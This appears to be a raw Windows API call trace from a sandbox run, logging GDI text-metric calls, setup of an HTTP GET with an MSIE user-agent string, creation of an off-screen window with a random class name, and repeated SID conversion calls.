[0090.599] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.599] GetSystemMetrics (nIndex=6) returned 1
[0090.600] GetDC (hWnd=0x0) returned 0x2b010799
[0090.600] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f308 | out: lptm=0x14f308) returned 1
[0090.600] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.600] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f340 | out: lptm=0x14f340) returned 1
[0090.600] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.600] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.600] GetSystemMetrics (nIndex=6) returned 1
[0090.600] GetDC (hWnd=0x0) returned 0x2b010799
[0090.600] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f00c | out: lptm=0x14f00c) returned 1
[0090.600] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.600] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f044 | out: lptm=0x14f044) returned 1
[0090.600] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.600] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.600] GetSystemMetrics (nIndex=6) returned 1
[0090.600] GetDC (hWnd=0x0) returned 0x2b010799
[0090.600] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f308 | out: lptm=0x14f308) returned 1
[0090.600] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.600] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f340 | out: lptm=0x14f340) returned 1
[0090.600] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.600] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.600] GetSystemMetrics (nIndex=6) returned 1
[0090.600] GetDC (hWnd=0x0) returned 0x2b010799
[0090.601] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f00c | out: lptm=0x14f00c) returned 1
[0090.601] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.601] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f044 | out: lptm=0x14f044) returned 1
[0090.601] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.601] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.601] GetSystemMetrics (nIndex=6) returned 1
[0090.601] GetDC (hWnd=0x0) returned 0x2b010799
[0090.601] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f308 | out: lptm=0x14f308) returned 1
[0090.601] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.601] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f340 | out: lptm=0x14f340) returned 1
[0090.601] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.601] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.601] GetSystemMetrics (nIndex=6) returned 1
[0090.601] GetDC (hWnd=0x0) returned 0x2b010799
[0090.601] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f00c | out: lptm=0x14f00c) returned 1
[0090.601] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.601] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f044 | out: lptm=0x14f044) returned 1
[0090.601] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.601] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.601] GetSystemMetrics (nIndex=6) returned 1
[0090.602] GetDC (hWnd=0x0) returned 0x2b010799
[0090.602] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f308 | out: lptm=0x14f308) returned 1
[0090.602] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.602] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f340 | out: lptm=0x14f340) returned 1
[0090.602] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.602] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.602] GetSystemMetrics (nIndex=6) returned 1
[0090.602] GetDC (hWnd=0x0) returned 0x2b010799
[0090.602] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f00c | out: lptm=0x14f00c) returned 1
[0090.602] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.602] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f044 | out: lptm=0x14f044) returned 1
[0090.602] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.602] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.602] GetSystemMetrics (nIndex=6) returned 1
[0090.602] GetDC (hWnd=0x0) returned 0x2b010799
[0090.602] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f2f4 | out: lptm=0x14f2f4) returned 1
[0090.602] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.602] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f32c | out: lptm=0x14f32c) returned 1
[0090.602] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.602] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.602] GetSystemMetrics (nIndex=6) returned 1
[0090.603] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f2f4 | out: lptm=0x14f2f4) returned 1
[0090.603] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.603] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f32c | out: lptm=0x14f32c) returned 1
[0090.603] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.603] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.603] GetSystemMetrics (nIndex=6) returned 1
[0090.603] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f2f4 | out: lptm=0x14f2f4) returned 1
[0090.603] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.603] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f32c | out: lptm=0x14f32c) returned 1
[0090.603] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.603] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.603] GetSystemMetrics (nIndex=6) returned 1
[0090.605] SysReAllocStringLen (in: pbstr=0x2a7f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0090.605] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.605] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.605] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.605] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0090.605] SysReAllocStringLen (in: pbstr=0x2a7f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a7f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0090.605] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x14f390, lpdwBufferLength=0x14f394 | out: lpBuffer=0x14f390, lpdwBufferLength=0x14f394) returned 1
[0090.696] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x14f390, dwBufferLength=0x4) returned 1
[0090.696] VirtualFree (lpAddress=0x2a80000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0090.697] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a76490, cbMultiByte=3, lpWideCharStr=0x14e2c8, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0090.697] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.697] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.697] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.697] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0090.697] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.697] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.697] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0090.697] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0090.697] GetWindowLongA (hWnd=0x301a8, nIndex=-20) returned 256
[0090.697] SetWindowLongA (hWnd=0x301a8, nIndex=-20, dwNewLong=384) returned 256
[0090.698] DefWindowProcA (hWnd=0x301a8, Msg=0x7c, wParam=0xffffffec, lParam=0x14f2bc) returned 0x0
[0090.698] DefWindowProcA (hWnd=0x301a8, Msg=0x7d, wParam=0xffffffec, lParam=0x14f2bc) returned 0x0
[0090.698] GetDesktopWindow () returned 0x10010
[0090.698] GetClassInfoA (in: hInstance=0x2950000, lpClassName="TmarxvxinhhmA", lpWndClass=0x14f344 | out: lpWndClass=0x14f344) returned 0
[0090.698] RegisterClassA (lpWndClass=0x14f390) returned 0xcfc165
[0090.698] CreateWindowExA (dwExStyle=0x10000, lpClassName="TmarxvxinhhmA", lpWindowName="xx", dwStyle=0x6cf0000, X=17354, Y=19825, nWidth=814, nHeight=27, hWndParent=0x10010, hMenu=0x0, hInstance=0x2950000, lpParam=0x0)
[0090.698] SetWindowLongA (hWnd=0x101e8, nIndex=-4, dwNewLong=2232277) returned 43568552
[0090.698] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.698] SetPropA (hWnd=0x101e8, lpString=0xc151, hData=0x2a72184) returned 1
[0090.698] SetPropA (hWnd=0x101e8, lpString=0xc158, hData=0x2a72184) returned 1
[0090.698] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e8, Msg=0x24, wParam=0x0, lParam=0x14ee14) returned 0x0
[0090.698] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e8, Msg=0x81, wParam=0x0, lParam=0x14edf8) returned 0x1
[0090.699] SetMenu (hWnd=0x101e8, hMenu=0x0)
[0090.699] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e8, Msg=0x46, wParam=0x0, lParam=0x14ea54) returned 0x0
[0090.699] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e8, Msg=0x83, wParam=0x1, lParam=0x14ea28) returned 0x0
[0090.699] InflateRect (in: lprc=0x14ea28, dx=0, dy=0 | out: lprc=0x14ea28) returned 1
[0090.699] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.699] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e8, Msg=0x47, wParam=0x0, lParam=0x14ea54)
[0090.699] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e8, Msg=0x3, wParam=0x0, lParam=0x4d8f43d2) returned 0x0
[0090.699] IsIconic (hWnd=0x101e8) returned 0
[0090.699] GetWindowRect (in: hWnd=0x101e8, lpRect=0x14e1fc | out: lpRect=0x14e1fc) returned 1
[0090.699] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.699] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.699] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e8, Msg=0x5, wParam=0x0, lParam=0x31e) returned 0x0
[0090.699] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14e208, fWinIni=0x0 | out: pvParam=0x14e208) returned 1
[0090.700] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.700] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.700] IsIconic (hWnd=0x101e8) returned 0
[0090.700] GetClientRect (in: hWnd=0x101e8, lpRect=0x14e1f0 | out: lpRect=0x14e1f0) returned 1
[0090.700] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.700] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.700] GetSystemMetrics (nIndex=20) returned 17
[0090.700] IsIconic (hWnd=0x101e8) returned 0
[0090.700] GetClientRect (in: hWnd=0x101e8, lpRect=0x14e1c0 | out: lpRect=0x14e1c0) returned 1
[0090.700] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.700] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 114229248
[0090.700] GetSystemMetrics (nIndex=20) returned 17
[0090.700] IsIconic (hWnd=0x101e8) returned 0
[0090.700] GetClientRect (in: hWnd=0x101e8, lpRect=0x14e1c0 | out: lpRect=0x14e1c0) returned 1
[0090.705] FlatSB_SetScrollProp (param_1=0x101e8, index=0x200, newValue=0x0, param_4=1) returned 0
[0090.739] GetSysColor (nIndex=20) returned 0xffffff
[0090.739] FlatSB_SetScrollProp (param_1=0x101e8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0090.739] FlatSB_SetScrollInfo (param_1=0x101e8, code=0, psi=0x14e1fe, fRedraw=1)
[0090.739] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e8, Msg=0x46, wParam=0x0, lParam=0x14e0fc) returned 0x0
[0090.744] GetTextExtentPoint32A (in: hdc=0x87010705, lpString="0", c=1, psizl=0x14f484 | out: psizl=0x14f484) returned 1
[0090.744] IsIconic (hWnd=0x101e8) returned 0
[0090.744] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f484 | out: lpRect=0x14f484) returned 1
[0090.744] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.744] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.744] IsIconic (hWnd=0x101e8) returned 0
[0090.744] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f3cc | out: lpRect=0x14f3cc) returned 1
[0090.744] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.744] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.744] IsIconic (hWnd=0x101e8) returned 0
[0090.744] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.744] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.744] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.744] IsIconic (hWnd=0x101e8) returned 0
[0090.744] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.744] FlatSB_SetScrollProp (param_1=0x101e8, index=0x200, newValue=0x0, param_4=0) returned 0
[0090.744] GetSysColor (nIndex=20) returned 0xffffff
[0090.744] FlatSB_SetScrollProp (param_1=0x101e8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0090.744] FlatSB_SetScrollInfo (param_1=0x101e8, code=0, psi=0x14f3da, fRedraw=1) returned 0
[0090.745] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.745] IsIconic (hWnd=0x101e8) returned 0
[0090.745] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.745] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.745] IsIconic (hWnd=0x101e8) returned 0
[0090.745] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.745] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.745] IsIconic (hWnd=0x101e8) returned 0
[0090.745] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.745] FlatSB_SetScrollProp (param_1=0x101e8, index=0x100, newValue=0x0, param_4=0) returned 0
[0090.745] GetSysColor (nIndex=20) returned 0xffffff
[0090.745] FlatSB_SetScrollProp (param_1=0x101e8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0090.745] FlatSB_SetScrollInfo (param_1=0x101e8, code=1, psi=0x14f3da, fRedraw=1) returned 0
[0090.745] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.745] IsIconic (hWnd=0x101e8) returned 0
[0090.745] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.745] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.745] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.745] IsIconic (hWnd=0x101e8) returned 0
[0090.745] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f3cc | out: lpRect=0x14f3cc) returned 1
[0090.745] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.745] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.745] IsIconic (hWnd=0x101e8) returned 0
[0090.745] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.745] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.746] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.746] IsIconic (hWnd=0x101e8) returned 0
[0090.746] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.746] FlatSB_SetScrollProp (param_1=0x101e8, index=0x200, newValue=0x0, param_4=0) returned 0
[0090.746] GetSysColor (nIndex=20) returned 0xffffff
[0090.746] FlatSB_SetScrollProp (param_1=0x101e8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0090.746] FlatSB_SetScrollInfo (param_1=0x101e8, code=0, psi=0x14f3da, fRedraw=1) returned 0
[0090.746] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.746] IsIconic (hWnd=0x101e8) returned 0
[0090.746] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.746] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.746] IsIconic (hWnd=0x101e8) returned 0
[0090.746] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.746] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.746] IsIconic (hWnd=0x101e8) returned 0
[0090.746] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.746] FlatSB_SetScrollProp (param_1=0x101e8, index=0x100, newValue=0x0, param_4=0) returned 0
[0090.746] GetSysColor (nIndex=20) returned 0xffffff
[0090.746] FlatSB_SetScrollProp (param_1=0x101e8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0090.746] FlatSB_SetScrollInfo (param_1=0x101e8, code=1, psi=0x14f3da, fRedraw=1) returned 0
[0090.746] GetWindowLongA (hWnd=0x101e8, nIndex=-16) returned 116326400
[0090.746] IsIconic (hWnd=0x101e8) returned 0
[0090.747] GetClientRect (in: hWnd=0x101e8, lpRect=0x14f39c | out: lpRect=0x14f39c) returned 1
[0090.747] GetCurrentThreadId () returned 0xf54
[0090.747] ConvertSidToStringSidA () returned 0x1
[0090.747] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.747] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0090.747] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.747] LocalFree (hMem=0x2b2f90) returned 0x0
[0090.747] ConvertStringSidToSidA () returned 0x1
[0090.747] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a72914, pSourceSid=0x2b2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a72914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.747] IsValidSid (pSid=0x2a72914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.747] ConvertSidToStringSidA () returned 0x1
[0090.747] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.747] LocalFree (hMem=0x2b2f90) returned 0x0
[0090.747] ConvertStringSidToSidA () returned 0x1
[0090.747] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7702c, pSourceSid=0x2b2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.747] IsValidSid (pSid=0x2a7702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.747] ConvertSidToStringSidA () returned 0x1
[0090.747] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.747] LocalFree (hMem=0x2b2f90) returned 0x0
[0090.747] ConvertStringSidToSidA () returned 0x1
[0090.747] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f5a0, pSourceSid=0x2b2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.748] IsValidSid (pSid=0x2a7f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.748] ConvertSidToStringSidA () returned 0x1
[0090.748] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.748] LocalFree (hMem=0x2b2f90) returned 0x0
[0090.748] ConvertStringSidToSidA () returned 0x1
[0090.748] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f614, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.748] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.748] ConvertSidToStringSidA () returned 0x1
[0090.748] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.748] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.748] ConvertStringSidToSidA () returned 0x1
[0090.748] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f688, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a7f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0090.748] IsValidSid (pSid=0x2a7f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0090.748] ConvertSidToStringSidA () returned 0x1
[0090.748] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.748] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.748] ConvertStringSidToSidA () returned 0x1
[0090.748] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f6fc, pSourceSid=0x2c6f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a7f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0090.748] IsValidSid (pSid=0x2a7f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0090.748] ConvertSidToStringSidA () returned 0x1
[0090.748] LocalFree (hMem=0x2bc1c8) returned 0x0
[0090.748] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.748] ConvertStringSidToSidA () returned 0x1
[0090.748] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f770, pSourceSid=0x2c6f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a7f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0090.748] IsValidSid (pSid=0x2a7f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0090.748] ConvertSidToStringSidA () returned 0x1
[0090.748] LocalFree (hMem=0x2bc1c8) returned 0x0
[0090.748] LocalFree (hMem=0x2c6f70) returned 0x0
[0090.748] ConvertStringSidToSidA () returned 0x1
[0090.748] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f7f8, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a7f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0090.749] IsValidSid (pSid=0x2a7f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0090.749] ConvertSidToStringSidA () returned 0x1
[0090.749] LocalFree (hMem=0x2bc1c8) returned 0x0
[0090.749] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.749] ConvertStringSidToSidA () returned 0x1
[0090.749] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f880, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a7f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0090.749] IsValidSid (pSid=0x2a7f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0090.749] ConvertSidToStringSidA () returned 0x1
[0090.749] LocalFree (hMem=0x2c6f58) returned 0x0
[0090.749] LocalFree (hMem=0x2c6f40) returned 0x0
[0090.749] ConvertStringSidToSidA () returned 0x1
